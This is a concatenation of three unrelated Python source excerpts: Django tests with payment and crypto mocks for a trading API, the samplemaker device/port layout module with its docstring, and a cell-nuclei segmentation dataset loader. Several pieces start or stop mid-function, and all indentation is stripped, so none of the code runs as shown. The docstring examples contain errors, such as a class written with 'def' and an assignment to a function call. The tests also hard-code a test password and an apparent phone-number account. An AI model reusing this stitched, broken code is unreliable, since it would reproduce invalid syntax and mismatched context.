logger.error('send_buy_apply_request_side_effec(): cannot find the payment account of the seller that test trans {0} try to buy from'.format(biz_content['out_trade_no']))
return 500, 'error', '{}'
except UserPaymentMethod.MultipleObjectsReturned:
logger.error('System find more than one payment account of the seller that test trans {0} try to buy from'.format(biz_content['out_trade_no']))
return 500, 'error', '{}'
key_values['from_account'] = buyer_account
key_values['to_account'] = seller_account
output_data = jinja2_render('tradeex/apitests/data/heepay_response_template.j2', key_values)
output_json = json.loads(output_data)
sign = sign_test_json(output_json, TEST_HY_KEY)
output_json['sign'] = sign
return 200, 'Ok', json.dumps(output_json, ensure_ascii=False)
#mock function
def send_buy_apply_for_redeem_side_effect(payload):
json_payload = json.loads(payload)
biz_content = json.loads(json_payload['biz_content'])
key_values = {}
key_values['app_id'] = json_payload['app_id']
key_values['out_trade_no'] = biz_content['out_trade_no']
key_values['subject'] = biz_content['subject']
key_values['total_fee'] = biz_content['total_fee']
key_values['hy_bill_no'] = TEST_HY_BILL_NO
#key_values['from_account'] = seller_account.account_at_provider
key_values['to_account'] = TEST_SELLER_ACCOUNT
output_data = jinja2_render('tradeex/apitests/data/heepay_response_template.j2', key_values)
output_json = json.loads(output_data)
sign = sign_test_json(output_json, TEST_HY_KEY)
output_json['sign'] = sign
return 200, 'Ok', json.dumps(output_json, ensure_ascii=False)
#mock function
def unlock_wallet_for_purchase_test(timeout_in_sec):
pass
#mock function
def send_fund_for_purchase_test(target_addr, amount, comment):
logger.info('send_fund_for_purchase_test():come to the mock of send fund()')
print('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& send_fund_for_purchase_test &&&&&&&&&&&&&&&&&&&&&&&&')
TestCase().assertEqual(TEST_CNY_ADDR, target_addr, "System should send purchase CNY to {0}".format(TEST_CNY_ADDR) )
amt_in_cent = int(amount*100)
TestCase().assertEqual(TEST_PURCHASE_AMOUNT, amt_in_cent, "System should come to send {0} unit of CNY".format(amt_in_cent))
TestCase().assertEqual(TEST_CRYPTO_SEND_COMMENT, comment, "System expects comment like '{0}'".format(TEST_CRYPTO_SEND_COMMENT))
return { 'txid': 'TEST_TXID'}
#mock function
def send_json_request_for_purchase_test(payload, trackId='', response_format='json'):
logger.debug('come to mock to send notification back to buyer')
TestCase().assertEqual('text', response_format, "System ask for text response")
#TODO: more validation on payload
return 'OK'
#mock function
def send_json_request_for_redeem_test(payload, trackId='', response_format='json'):
logger.debug('come to mock to send notification back to buyer')
TestCase().assertEqual('text', response_format, "System ask for text response")
#TODO: more validation on payload
return 'OK'
# Create your tests here.
class TestTradingAPI(TransactionTestCase):
fixtures = ['fixture_test_tradeapi.json']
def setUp(self):
pass
def validate_success_prepurchase_response(self, resp_json):
self.assertEqual(resp_json['return_code'], 'SUCCESS')
return True
def validate_user_info(self, username):
useraccountInfo = useraccountinfomanager.get_user_accountInfo(User.objects.get(username=username),'AXFund')
self.assertTrue(useraccountInfo.balance > 0, "the balance of {0} should be larger than 0".format(username))
self.assertTrue(useraccountInfo.available_balance > 0, "the available balance of {0} should be larger than 0".format(username))
self.assertTrue(useraccountInfo.paymentmethods, "user {0} should have payment info".format(username))
self.assertEqual(1, len(useraccountInfo.paymentmethods), "There should be 1 payment method for user {0}".format(username))
self.assertEqual('heepay', useraccountInfo.paymentmethods[0].provider_code, "user {0}\'s payment method should come from heepay".format(username))
self.assertTrue(useraccountInfo.paymentmethods[0].account_at_provider, "User {0} should have account at heepay".format(username))
def validate_purchase_first_state(self,request_obj, resp_json):
api_trans = None
try:
api_trans = APIUserTransaction.objects.get(api_out_trade_no=TEST_OUT_TRADE_NO_REDEEM)
except APIUserTransaction.DoesNotExist:
self.fail('There should be one api user transaction record for {0} API call'.format(TEST_OUT_TRADE_NO_REDEEM))
except APIUserTransaction.MultipleObjectsReturned:
self.fail('There should not be more than one api user transaction record for {0} API call'.format(TEST_OUT_TRADE_NO_REDEEM))
self.assertEqual(api_trans.action, API_METHOD_REDEEM)
self.assertTrue(api_trans.reference_order)
self.assertEqual('SELL', api_trans.reference_order.order_type)
self.assertEqual('ALL_OR_NOTHING', api_trans.reference_order.sub_type)
self.assertEqual('API', api_trans.reference_order.order_source)
self.assertTrue(math.fabs(round(request_obj.total_fee/100.0, 8) - api_trans.reference_order.total_amount) < 0.00000001)
def create_no_fitting_order(self):
print('create_no_fitting_order()')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 100, 0.5, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 100 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 100 units hit issue')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 200, 0.3, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 200 units hit issue')
show_order_overview()
def create_fitting_order(self, amount):
print('create_fitting_order({0})'.format(amount))
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 200, 0.5, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 200*0.5 units hit issue')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 156, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 150*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 150*0.4 units hit issue')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 156, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 156*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 156*0.5 units hit issue')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 150, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 200*0.4 units hit issue')
def get_api_trans(self, target_out_trade_no):
try:
return APIUserTransaction.objects.get(api_out_trade_no = target_out_trade_no)
except APIUserTransaction.DoesNotExist:
self.fail('System cannot find the api trans for out_trade_no {0}'.format(target_out_trade_no))
except APIUserTransaction.MultipleObjectsReturned:
self.fail('System find more than one api trans for out_trade_no {0}'.format(target_out_trade_no))
def validate_api_trans_before_confirm(self, api_trans, expected_app_id,
expected_secret_key, expected_out_trade_no, **kwargs):
self.assertEqual(expected_app_id, api_trans.api_user.apiKey, 'api_trans api_key is not expected')
self.assertEqual(expected_secret_key, api_trans.api_user.secretKey, 'api_trans secret_key is not expected')
self.assertEqual(expected_out_trade_no, api_trans.api_out_trade_no, 'api_trans out trade no is not expected')
if kwargs:
for key, value in kwargs.items():
if key == 'expected_subject':
self.assertEqual(value, api_trans.subject, 'api_trans subject is not expected')
elif key == 'expected_attach':
self.assertEqual(value, api_trans.attach, 'api_trans attach is not expected')
elif key == 'expected_total_fee':
self.assertEqual(value, api_trans.total_fee, 'api_trans total_fee is not expected')
elif key == 'expected_return_url':
self.assertEqual(value, api_trans.return_url, 'api_trans return_url is not expected')
elif key == 'expected_notify_url':
self.assertEqual(value, api_trans.notify_url, 'api_trans notify_url is not expected')
def create_heepay_confirm(self, template_path, api_trans, trade_status, payment_time):
key_values = {}
key_values['app_id'] = TEST_HY_APPID
# for purchase transaction, the transaction's reference order is the purchase order
if api_trans.action == 'wallet.trade.buy':
purchase_order = api_trans.reference_order
# for redeem transaction, we need to get the purchase order of the sell order that
# the transaction put forwarder
elif api_trans.action == 'wallet.trade.sell':
purchase_order = Order.objects.get(reference_order__order_id=api_trans.reference_order.order_id, order_type='BUY')
key_values['out_trade_no'] = purchase_order.order_id
key_values['subject'] = api_trans.subject if api_trans.subject else ''
key_values['total_fee'] = api_trans.total_fee
key_values['hy_bill_no'] = TEST_HY_BILL_NO
key_values['trade_status'] = trade_status
# Let's assume there's no from account for heepay
#key_values['from_account'] = TEST_BUYER_ACCOUNT
try:
seller_account = UserPaymentMethod.objects.get(
user__id=purchase_order.reference_order.user.id,
provider__code = 'heepay')
except UserPaymentMethod.DoesNotExist:
self.fail('System cannot find the payment account of the seller that test trans {0} try to buy from'.format(api_trans.api_out_trade_no))
except UserPaymentMethod.MultipleObjectsReturned:
self.fail('System find more than one payment account of the seller that test trans {0} try to buy from'.format(api_trans.api_out_trade_no))
key_values['to_account'] = seller_account.account_at_provider
key_values['payment_time'] = payment_time
output_data = jinja2_render('tradeex/apitests/data/heepay_confirm_template.j2', key_values)
output_json = json.loads(output_data)
logger.debug('create_heepay_confirm(): about to sign heepay confirmation')
sign = sign_test_json(output_json, TEST_HY_KEY)
output_json['sign'] = sign
# TODO: this is to validate the sign
#HeepayNotification.parseFromJson(output_json, api_trans.api_user.secretKey, False)
return output_json
"""
def test_purchase_order_succeed_bad_payment_acct(self):
self.create_fitting_order(62)
# update the <EMAIL>'s heepay account into bad account, since this user's order
# is selected for the purchase, this update will failed the test.
updated = UserPaymentMethod.objects.filter(user__username='<EMAIL>').filter(provider__code='heepay').update(account_at_provider='bad_user_account')
self.assertTrue(updated, 'change <EMAIL>\'s heepay account should be successful')
request = TradeAPIRequest(
API_METHOD_PURCHASE,
TEST_API_USER1_APPKEY,
TEST_API_USER1_SECRET,
'order_match', # order id
None, # trx _id
62, # total fee
10, # expire_minute
'heepay', 'not_exist',
'127.0.0.1', #client ip
attach='userid:1',
subject='人民币充值测试-没有付款账号',
notify_url=TEST_NOTIFY_URL,
return_url='http://retururl')
c = Client()
request_str = request.getPayload()
print('send request {0}'.format(request_str))
response = c.post('/api/v1/applypurchase/', request_str,
content_type='application/json')
self.assertTrue(UserPaymentMethod.objects.filter(user__username='<EMAIL>').filter(provider__code='heepay').update(account_at_provider='18600701961'),
'recover <EMAIL>\'s heepay account should be successful')
print('response is {0}'.format(json.dumps(json.loads(response.content.decode('utf-8')), ensure_ascii=False)))
self.assertEqual(200, response.status_code)
resp_json = json.loads(response.content.decode('utf-8'))
self.assertEqual(resp_json['return_code'], 'FAIL')
self.assertEqual(resp_json['return_msg'], "收钱方账号不存在")
"""
# happy path for purchasing from 3rd party by using weixing (manual)
def test_purchase_order_from_3rdParty_success_by_weixing(self):
return True
# 3rd party purchase request fail when
def test_purchase_order_from_3rdParty_fail_by_missing_externalAddress(self):
# API_USER2 is from www.3rdparty.com, check tradeex/apitests/fixtures/fixture_test_tradeapi.json, "model": "tradeex.apiuseraccount".
request = TradeAPIRequest(
API_METHOD_PURCHASE,
TEST_API_USER2_APPKEY, TEST_API_USER2_SECRET,
"any_out_trade_no", # out_trade_no
total_fee=TEST_PURCHASE_AMOUNT, # total fee
expire_minute=10, # expire_minute
payment_provider='heepay',
payment_account='12738456',
client_ip='127.0.0.1', # client ip
attach='userid:1',
subject='人民币充值成功测试',
notify_url='http://testurl',
return_url='http://testurl',
# external_cny_rec_address = "xxxxx", missing this variable is the reason why it fails.
)
c = Client()
request_str = request.getPayload()
print('test_purchase_order_from_3rdParty_fail_by_missing_externalAddress(): send request {0}'.format(request_str))
response = c.post('/api/v1/applypurchase/', request_str,
content_type='application/json')
resp_json = json.loads(response.content.decode('utf-8'))
print('response is {0}'.format(json.dumps(resp_json, ensure_ascii=False)))
self.assertEqual('FAIL', resp_json['return_code'])
self.assertEqual('请提供相应的支付账号', resp_json['return_msg'])
@patch('tradeex.controllers.crypto_utils.CryptoUtility.unlock_wallet', side_effect=unlock_wallet_for_purchase_test)
@patch('tradeex.controllers.crypto_utils.CryptoUtility.send_fund', side_effect=send_fund_for_purchase_test)
@patch('trading.controller.heepaymanager.HeePayManager.send_buy_apply_request',
side_effect=send_buy_apply_request_side_effect)
@patch('tradeex.client.apiclient.APIClient.send_json_request', side_effect=send_json_request_for_purchase_test)
def test_purchase_order_succeed(self,send_json_request_function,
send_buy_apply_request_function,
send_fund_function,
unlock_wallet_function):
# create test | |
# -*- coding: utf-8 -*-
"""
This module contains the base classes for generating re-usable device classes.
The Device class
----------------
The `Device` class is an interface to generate specific devices.
In `samplemaker` a device is the combination of drawing commands that generate
a specific pattern which is typically re-used in different layouts.
The devices are parametric, in the sense that the pattern can be a function of
external parameters.
For example, a cross mark device can be a function of the mark size, the width of
cross arms, etc.
The `Device` class provides a common interface to define parameters and drawing
functions. To create a new device, simply derive the `Device` class and provide
an implementation for parameters and geometry:
def MyFancyDevice(Device):
def initialize(self):
# Initialization stuff goes here
pass
def parameters(self):
# Parameters are defined here
pass
def geom(self):
# Drawing goes here
pass
def ports(self):
# Ports go here
pass
# To use:
dev = MyFancyDevice.build()
geom = dev.run()
As bare minimum, the initialize, parameters and geom methods should be re-implemented in a
device class.
### Device name
When initializing the device it is very important to give it a unique name as a string
(and optionally a description).
This is done in the `Device.initialize` method:
def initialize(self):
self.set_name("MYDEVICE")
self.set_decription("First version of MYDEVICE")
The name is used to call devices later on (see Device registraiton below) and
to instantiate them in circuits.
### Parameters
Device paramters must be defined via the function `Device.add_parameter` as follows:
def parameters(self):
self.add_parameter("my_param", default_value, "Description", type, (min, max))
The default value is usually hard-coded into the device itself and should be the
reference value for creating the geometry. Optionally, the parameter type can be specified
as `bool` or `int` or `float`. The use of string is not recommended but it is not
forbidden. Also optionally, a range can be specified for integer and float values as a tuple.
This helps the user of the device in figuring out what makes sense. For example:
def parameters(self):
self.add_parameter("length", 15, "Length of the marker", float, 2, 30)
To use one of the parameter in the drawing, use the `Device.get_params` function
to get a dictionary of the parameters with values:
def geom(self):
p = self.get_params()
L = p["length"] # Marker length
### Drawing the geometry
The `Device.geom` method should be implemented so that it returns a `samplemaker.shapes.GeomGroup`
object with the geometry.
The user should never run the `Device.geom` method, but use instead `Device.run` (see example above).
### Building, running, what is all that?
A device object is never instantiated via its constructor __init__ but using
the class method `Device.build`.
Building a device is like initializing it, setting the default parameters and preparing the device
to be drawn.
To actually draw the geometry you use the `Device.run` method, which ensures that
the exact sequence of operation is carried out.
### Device registration
To use the re-use the devices later on, it is common practice to build a library of
devices (containing all the classes) and register the devices to a shared dictionary
that other functions can use to build/run named devices.
This is achieved via the `registerDevicesInModule` which can be called at the end
of each python script and will update a hidden device database.
Building a device is then simply done as
dev = Device.build_registered("MYDEVICE")
geom = dev.run()
See example
Device Ports
------------
An important part of device creation is to define ports that can connect a device
to another one.
To define ports, `samplemaker` provides the base class `DevicePort`.
The class defines a named port, with position and orientation.
The device ports are specified by re-implementing the `Device.ports` function and
calling the `Device.addport` method:
def ports(self):
p1 = DevicePort(20,40,True,True)
self.addport("port1", p1)
The above code generates a `DevicePort` placed at (20,40) facing east.
The two boolean define whether the port is oriented horizontally or vertically
and if it faces forward or backward.
Check the documentation of `DevicePort` to learn more about port properties.
Quite often, when creating ports, it is necessary to use some variable which is
only defined locally in the geom() function.
To define ports directly from geom(), one can use the method `Device.addlocalport`
instead and leave the ports() methods not implemented:
def geom(self):
p1 = DevicePort(20,40,True,True)
self.addlocalport("port1", p1)
Do not use `Device.addport` from the geom() command as it will not work.
### Implementing custom device ports
Users can define different port types by inheriting the `DevicePort` class.
For example one might be interested in defining optical ports (for waveguide devices)
and electrical ports (for electronic circuits).
The default DevicePort in fact cannot be connected to anything until the user
supplies a connector function.
For example
def OpticalPortConnector(port1: "DevicePort",port2: "DevicePort") -> "GeomGroup":
# functions that calculate and draw the connector
return geom
class OpticalPort(DevicePort):
def __init__(self,x0,y0,horizontal,forward,width,name):
super().__init__(x0,y0,horizontal,forward)
self.width = width
self.name=name
self.connector_function=OpticalPortConnector
The newly created OpticalPort can now be connected to other OpticalPort ports.
Circuits
---------
Once ports are specified, it is possible to create circuits that connect various
devices with each others.
A circuit is itself a `Device` with parameters and ports, except the drawing routine is
controlled by a netlist that defines what devices should be instantiated, where,
and how connectivity is defined.
### Defining a netlist
The `NetList` class speficies a circuit layout. To specify a Netlist, you need to
provide a list of entries via the class `NetListEntry`.
A single entry of the netlist correspond to a device name (which should be registered)
position, and connectivity:
entry1 = NetListEntry("MYDEVICE", 0, 0, "E", {"port1":"inA","port2":"inB"}, {"length":16})
In the above example MYDEVICE will be placed in 0,0 facing East ("E") and his parameter "length" will be set to 16.
Additionally the named DevicePort "port1" has been assigned to wire "inA" and "port2" to wire "inB".
The circuit builder will look for any other entry where a port has been assigned to wire "inA" and run
the connector (provided by user) between the two ports.
If a matching port cannot be found, the wire will become the name of an external port of the entire circuit.
The netlist is then built specifying the list of entries and a circuit can be build exactly as a
standard device:
netlist = NetList("my_circuit", [entry1,entry2,entry3])
cir_dev = Circuit.build() # Note that we build first
cir_dev.set_param("NETLIST") = netlist # Set the NETLIST parameter
g = cir_dev.run() # and finally run the device
More details on specifying circuits are given in the tutorials, where it is also
explained how to nest circuits together (i.e. creating netlists of netslists)
"""
import math
import sys,inspect
import numpy as np
from copy import deepcopy
from samplemaker.shapes import GeomGroup, Poly
from samplemaker.makers import make_sref, make_text
from samplemaker import LayoutPool, _DeviceCountPool, _DeviceLocalParamPool, _DevicePool, _BoundingBoxPool
from samplemaker.gdswriter import GDSWriter
from samplemaker.gdsreader import GDSReader
class DevicePort:
def __init__(self,x0,y0,horizontal,forward):
self.x0=x0
self.y0=y0
self.__px = x0
self.__py = y0
self.hv = horizontal
self.bf = forward
self.__hv = horizontal
self.__bf = forward
self.name = ""
self._geometry = GeomGroup() # it can carry a full geom to which it is connected
self._parentports = dict() # any other port shared with this port in the same device
self.connector_function = None
def set_name(self,name):
self.name=name
def angle(self):
return math.pi*(3-(self.hv+self.bf*2))/2
def set_angle(self,angle):
i = round(3-angle*2/math.pi)%4
self.hv = i%2==1
self.bf = math.floor(i/2)==1
def printangle(self):
if(self.hv and self.bf): print("E")
if(self.hv and not self.bf): print("W")
if(not self.hv and self.bf): print("N")
if(not self.hv and not self.bf): print("S")
def angle_to_text(self):
if(self.hv and self.bf): return "E"
if(self.hv and not self.bf): return "W"
if(not self.hv and self.bf): return "N"
if(not self.hv and not self.bf): return "S"
def dx(self):
return self.hv*(2*self.bf-1)
def dy(self):
return (not self.hv)*(2*self.bf-1)
def rotate(self,x0,y0,angle):
xc=self.x0-x0
yc=self.y0-y0
cost = math.cos(math.radians(angle))
sint = math.sin(math.radians(angle))
self.x0=cost*xc-sint*yc+x0
self.y0=sint*xc+cost*yc+y0
self.set_angle(self.angle()+math.radians(angle))
def S(self,amount):
self.x0+=self.dx()*amount
self.y0+=self.dy()*amount
def BL(self,radius):
xc = self.x0-self.dy()*radius
yc = self.y0+self.dx()*radius
phi = self.angle()-math.pi/2
self.x0=radius*math.cos(phi+math.pi/2)+xc
self.y0=radius*math.sin(phi+math.pi/2)+yc
self.set_angle(self.angle()+math.pi/2)
def BR(self,radius):
xc = self.x0+self.dy()*radius
yc = self.y0-self.dx()*radius
phi = self.angle()+math.pi/2
self.x0=radius*math.cos(phi-math.pi/2)+xc
self.y0=radius*math.sin(phi-math.pi/2)+yc
self.set_angle(self.angle()-math.pi/2)
def reset(self):
self.x0=self.__px
self.y0=self.__py
self.hv=self.__hv
self.bf=self.__bf
def fix(self):
self.__px=self.x0
self.__py=self.y0
self.__hv=self.hv
self.__bf=self.bf
def dist(self,other):
dx = other.x0-self.x0
dy = other.y0-self.y0
return math.sqrt(dx*dx+dy*dy)
class Device:
def __init__(self):
"""
Initializes a Device. Should never be called.
Returns
-------
None.
"""
self._p = | |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(r'D:\DeepLearning\Kaggle\Datahandling')
import utils_for_datasets
import glob
import numpy as np
import cv2
import re
import os.path
import scipy
import time
from skimage.measure import label
import skimage.transform as ski_transform
import matplotlib.pyplot as plt
DATASETROOT = 'CVSP\Cameratrap'
DATASETROOT_CVL = 'CVSP\CVL'
UNETROOT = 'D:\DeepLearning\Semantic_segmentation\Cameratrap_Dataset'
UNETROOT_CVL = 'D:\DeepLearning\Semantic_segmentation\CVL_Dataset'
DATASET_FOLDER_TISQUANT = r'D:\DeepLearning\SCCHCode\TisQuantValidation\data'
#DATASET_FOLDER_KAGGLE = r'D:\\DeepLearning\\SCCHCode\\data\\kaggle-dsbowl-2018-dataset-fixes-master\\stage1_train'
#DATASET_FOLDER_KAGGLE = r'D:\\DeepLearning\\SCCHCode\\data\\Kaggle\\stage1_train'
from scipy.io import loadmat, savemat
from tifffile import tifffile
from Config.Config import UNETSettings
from tqdm import tqdm
class TisquantDataset(utils_for_datasets.Dataset):
def load_data(self,width=None,height=None,ids=None,mode=1):
self.add_class("Nuclei",1,'Nucleus')
if (mode==1):
data_file = "256x256_TisQuantTrainingData_Evaluation1_new.mat"
else:
data_file = "256x256_TisQuantTestData_Evaluation1_new.mat"
print('... LOADING DATA')
Images, Labels, FileNames = [], [], []
raw_data = loadmat(os.path.join(DATASET_FOLDER_TISQUANT, data_file), struct_as_record=True)
if (mode==1):
raw_data = raw_data['trainingset']
else:
raw_data = raw_data['testset']
Images, Masks = [], []
slice_size = 256
masks = raw_data['groundtruth'][0]
raw_images = raw_data['rawimage'][0]
n_images = len(raw_images)
for i,img in enumerate(raw_images):
#img_new = np.zeros((3, img.shape[0], img.shape[1]))
#img_new[0] = img
#img_new[1] = img
#img_new[2] = img
#Images.append(img_new / 255.0)
#Images.append(img / 255.0)
#Images.append(img / 255.0)
Images.append(img)
#Masks.append(label(masks[i]>0))
Masks.append(masks[i])
# convert to conv net format
img_size = Images[0].shape
#Images = np.asarray(Images, dtype=np.float32).reshape(-1, img_size[0], img_size[1],img_size[2])
#Images = np.transpose(Images, (0, 2, 3, 1))
Images = np.asarray(Images, dtype=np.float32).reshape(-1, img_size[0], img_size[1])
#Masks = np.asarray(Masks, dtype=np.float32).reshape(-1, 1, img_size[1], img_size[2])
#Masks = np.transpose(Masks, (0, 2, 3, 1))
Masks = np.asarray(Masks, dtype=np.float32).reshape(-1, img_size[0], img_size[1])
train_val = 0.8
ret_val = 0
n_tr = int(round(Images.shape[0] * 0.8))
ids = np.arange(Images.__len__())
if (mode == 1): # Trainingset
np.random.shuffle(ids)
self.images = Images
self.masks = Masks
for i in range(self.images.shape[0]):
self.add_image("Nuclei", image_id=i, path=None,width=width, height=height)
self.train_cnt = int(self.images.__len__()*0.8)
#self.images = np.transpose(self.images,(0,3,1,2))
#self.masks = np.transpose(self.masks,(0,3,1,2))
return ids
def getMeanMaskObjectSize(self, image_id):
masks = self.load_mask(image_id)
masks_new = masks[0][:, :, 1:]
print("Summe: {0}, Laenge: {1}".format(masks_new.sum(), masks_new.shape[2]))
if (np.isnan(masks_new.sum() / masks_new.shape[2])):
return 0
else:
return int(masks_new.sum() / masks_new.shape[2])
def load_image(self, image_id):
return self.images[image_id]
def image_reference(self, image_id):
"""Return the shapes data of the image."""
info = self.image_info[image_id]
if info["source"] == "shapes":
return info["shapes"]
else:
super(self.__class__).image_reference(self, image_id)
def load_mask(self, image_id):
"""Generate instance masks for shapes of the given image ID.
"""
info = self.image_info[image_id]
mask = self.masks[image_id]
count = int(mask.max())
mask_new = np.zeros([info['height'], info['width'], count+1], dtype=np.uint8) # one more for background
for i in range(count+1):
#mask_new[:, :, i:i+1] = (mask == i).transpose(1, 2, 0)
mask_new[:, :, i:i + 1] = (mask==i).reshape(mask.shape[0], mask.shape[1], -1)
# mask_new[:, :, i:i+1] = (mask==i).transpose(1,2,0)
# Map class names to class IDs.
class_ids = np.ones(count+1) # one more fore background
#add Background
#class_ids[count] = 0 # add Background
#mask_new[:, :, count:count + 1] = (mask == 0).transpose(1, 2, 0)
#class_ids[count] = 0 # add Background
class_ids[0] = 0 # add Background
# End add Background
return mask_new, class_ids.astype(np.int32)
def load_mask_one_layer(self,image_id):
return self.masks[image_id]#[0]
class KaggleDataset(utils_for_datasets.Dataset):
def load_data(self,width=None,height=None,ids=None,mode=1,folders=None):
self.image_path = []
self.mask_path = []
self.add_class("Nucleus",1,'Nucleus')
self.setImagePaths(folders)
ids = np.arange(self.image_path.__len__())
np.random.seed(1)
np.random.shuffle(ids)
self.ids = ids
for i in self.ids:
self.add_image("Nucleus", image_id=i, path=None)
return ids
def load_image(self, image_id):
info = self.image_info[image_id]
img = cv2.imread(self.image_path[self.ids[image_id]])
#img = ski_transform.resize(img, (info['height'], info['width']), mode='reflect')
return img
def setImagePaths(self,folders=""):
for folder in os.listdir(folders):
file_pattern = os.path.join(folders,folder,'images',"*.png")
#print(file_pattern)
img_files = glob.glob(file_pattern)
for i in img_files:
self.image_path.append(i)
self.mask_path.append(os.path.join(folders,folder,'masks'))
def image_reference(self, image_id):
"""Return the shapes data of the image."""
info = self.image_info[image_id]
if info["source"] == "shapes":
return info["shapes"]
else:
super(self.__class__).image_reference(self, image_id)
def load_mask(self, image_id):
"""Generate instance masks for shapes of the given image ID.
"""
mask_path = self.mask_path[self.ids[image_id]]
file_pattern = os.path.join(mask_path, "*.png")
info = self.image_info[image_id]
mask_files = glob.glob(file_pattern)
#mask_tmp = cv2.imread(mask_files[0])
mask_new = np.zeros([info['height'], info['width'], mask_files.__len__()+1], dtype=np.uint8) # one more for background
count = 1
mask_total = 0
for i in mask_files:
mask = cv2.imread(i)
mask = mask[:, :, 1] / 255.0
#mask = ski_transform.resize(mask, (info['height'], info['width']), mode='reflect')
mask_new[:, :, count] = (mask)
mask_total = mask_total + (mask>0) * count
count = count + 1
# Map class names to class IDs.
class_ids = np.ones(count) # one more fore background
#add Background
class_ids[0] = 0; # Background
mask_new[:, :, 0] = np.invert(mask_total.astype(np.bool))
# End add Background
return mask_new, class_ids.astype(np.int32)
def load_mask_one_layer(self, image_id):
"""Generate instance masks for shapes of the given image ID.
"""
mask_path = self.mask_path[self.ids[image_id]]
file_pattern = os.path.join(mask_path, "*.png")
info = self.image_info[image_id]
mask_files = glob.glob(file_pattern)
#mask_tmp = cv2.imread(mask_files[0])
mask_new = np.zeros([info['width'], info['height'], mask_files.__len__()+1], dtype=np.uint8) # one more for background
count = 1
mask_total = 0
for i in mask_files:
mask = cv2.imread(i)
mask = mask[:, :, 1] / 255.0
#mask = ski_transform.resize(mask, (info['height'], info['width']), mode='reflect')
mask_new[:, :, count] = (mask)
mask_total = mask_total * (mask == 0)
mask_total = mask_total + (mask>0) * count
count = count + 1
return mask_total
def getMeanMaskObjectSize(self, image_id):
mask_path = self.mask_path[self.ids[image_id]]
file_pattern = os.path.join(mask_path, "*.png")
mask_files = glob.glob(file_pattern)
total_sum = 0;
for i in mask_files:
mask = cv2.imread(i)
total_sum = total_sum + (mask>0).sum()
return (total_sum / mask_files.__len__()).astype(np.int16)
def pre_process_img(self,img, color):
"""
Preprocess image
"""
if color is 'gray':
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
elif color is 'rgb':
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
else:
pass
img = img.astype(np.float32)
img /= 255.0
return img
class ArtificialNucleiDataset(utils_for_datasets.Dataset):
img_prefix = 'Img_'
img_postfix = '-outputs.png'
mask_prefix = 'Mask_'
mask_postfix = '.tif'
settings = UNETSettings()
def load_data(self, width=256, height=256, ids=None, mode=1):
# Load settings
self.image_path = []
self.mask_path = []
self.add_class("ArtificialNuclei", 1, 'ArtificialNuclei')
train_cnt = 0
val_cnt = 0
print("Loading train data ...")
if self.settings.network_info["traintestmode"] == 'train':
for i in self.settings.network_info["dataset_dirs_train"].split(';'):
img_range = self.setImagePaths(folders=[i + "\\images"])
self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
print("Checking train path ...")
self.checkPath()
print("Loading val data ...")
train_cnt = self.image_path.__len__()
for i in self.settings.network_info["dataset_dirs_val"].split(';'):
img_range = self.setImagePaths(folders=[i + "\\images"])
self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
print("Checking val path ...")
self.checkPath()
val_cnt += self.image_path.__len__() - train_cnt
#ids = np.arange(self.image_path.__len__())
ids_train = np.arange(0,train_cnt)
ids_val = np.arange(train_cnt, train_cnt+val_cnt)
self.train_cnt = train_cnt
self.val_cnt = val_cnt
np.random.shuffle(ids_train)
np.random.shuffle(ids_val)
self.ids = np.concatenate((ids_train,ids_val),axis=0)
else:
for i in self.settings.network_info["dataset_dirs_test"].split(';'):
img_range = self.setImagePaths(folders=[i + "\\images"])
self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
print("Checking train path ...")
self.checkPath()
self.ids = np.arange(0,self.image_path.__len__())
for i in self.ids:
self.add_image("ArtificialNuclei", image_id=i, path=None, width=width, height=height)
return ids
def checkPath(self):
to_delete = []
for index,i in tqdm(enumerate(self.image_path)):
if not os.path.exists(i):
to_delete.append(index)
to_delete.sort(reverse=True)
for i in to_delete:
del self.image_path[i]
del self.mask_path[i]
def load_image(self, image_id):
info = self.image_info[image_id]
img_final = cv2.imread(self.image_path[self.ids[image_id]])
try:
img_final = img_final[:,:,0]
except:
None
#return img_final / 255.0
if self.settings.network_info["netinfo"] == 'maskrcnn': # mask rcnn need an rgb image
img_new = np.zeros((img_final.shape[0],img_final.shape[1],3))
img_new[:,:,0] = img_new[:,:,1] = img_new[:,:,2] = img_final
img_final = img_new
return img_final
def setImagePaths(self, folders=""):
for folder in folders:
file_pattern = os.path.join(folder, self.img_prefix + "*" + self.img_postfix) #"Img_*-outputs.png")
print(file_pattern)
img_files = glob.glob(file_pattern)
img_files.sort()
img_range = range(0,img_files.__len__())
for i in img_range:
#self.image_path.append(os.path.join(folder, "Img_" + str(i) + "-outputs.png"))
self.image_path.append(os.path.join(folder, self.img_prefix + str(i) + self.img_postfix))
# for i in img_files:
# self.image_path.append(i)
return img_range
def setMaskPaths(self, folders="",img_range=None):
for folder in folders:
file_pattern = os.path.join(folder, self.mask_prefix + "*" + self.mask_postfix) #"Mask_*.tif")
print(file_pattern)
